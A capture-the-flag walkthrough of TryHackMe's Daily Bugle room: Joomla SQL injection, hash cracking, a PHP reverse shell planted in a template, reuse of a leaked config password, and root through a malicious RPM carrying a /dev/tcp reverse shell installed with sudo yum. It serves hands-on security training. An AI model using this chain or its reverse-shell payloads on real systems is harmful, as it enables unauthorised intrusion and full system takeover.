Today, we will root the Daily Bugle Machine from TryHackMe.
After deploying the machine, We are greeted with the first question.
Access the Server, Who robbed the bank?
Pretty straight-forward.
Answer is there.
The next question says, the CMS is Joomla. We need to find the version.
Upon a Google search, I ended up here.
So, we can read the version by visiting
http://10.10.249.33/administrator/manifests/files/joomla.xml
We got the version too.
This version of Joomla has an SQL injection vulnerability. Lets look up.
https://www.exploit-db.com/exploits/42033
We can try with SQL Map, But a simpler pyhon script is available.
https://github.com/XiphosResearch/exploits/tree/master/Joomblah
Lets run this on our target.
kali@kali:~/ex$ python joomblah.py http://10.10.249.33
We got the admin password hashes!
Lets crack this with John.
root@kali:/home/kali/ex# john -w=/usr/share/wordlists/rockyou.txt jonah.txt -form=bcrypt
It took 40 minutes to get the hash cracked in my VM.
Lets login now.
http://10.10.249.33/administrator/
With the password we just found.
Once We are inside, Go to templates > Templates and click on name of the active template.
Select the Index.php file and paste the reverse shell php script. Download the file from here and update with our IP.
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Now listen from our machine port 4444 and load the main page of the site.
kali@kali:~/ex$ nc -nlvp 4444
listening on [any] 4444 ...
We got a reverse shell!
Let’s find the user flag now. First find the users.
sh-4.2$ cat /etc/passwd
Lets have a look at jjameson’s home directory.
But we dont have the permission for that.
Lets find some other way.
Have a look at /var/www/html/configuration.php file.
Lets try this password for the user.
bash-4.2$ su jjameson
su jjameson
Password: nv5uz9r3ZEDzVjNu
[jjameson@dailybugle html]$
Success!
The user can run yum without password on the machine.
We can read the user flag now.
We can install any package with yum as root user. Have a look at the following page.
https://gtfobins.github.io/gtfobins/yum/
Let us create a specially crafted RPM package and install in the target.
Lets follow this guide for the process.
root@kali:/home/kali/ex# git clone https://github.com/jordansissel/fpm
root@kali:/home/kali/ex/fpm# gem install fpm
root@kali:/home/kali/ex/fpm# apt-get install rpm
Now create a file named root.sh for reverse shell.
#! /bin/bash
bash -i >& /dev/tcp/10.9.42.115/9999 0>&1
Now create the RPM Package.
root@kali:/home/kali/ex# fpm -n root -s dir -t rpm -a all --before-install root.sh /home/kali/ex
Now, Lets transfer the file to the target machine and install the package.
root@kali:/home/kali/ex# python -m SimpleHTTPServer 222
and in the target,
[jjameson@dailybugle ~]$ wget http://10.9.42.115:222/root-1.0-1.noarch.rpm
Listen for a connection at port 9999 in our attacker machine.
root@kali:/home/kali/ex# nc -nlvp 9999
listening on [any] 9999 ...
and install the package in the target.
[jjameson@dailybugle ~]$ sudo yum localinstall -y root-1.0-1.noarch.rpm
We got the root shell!
Lets read the root flag now.
Done!!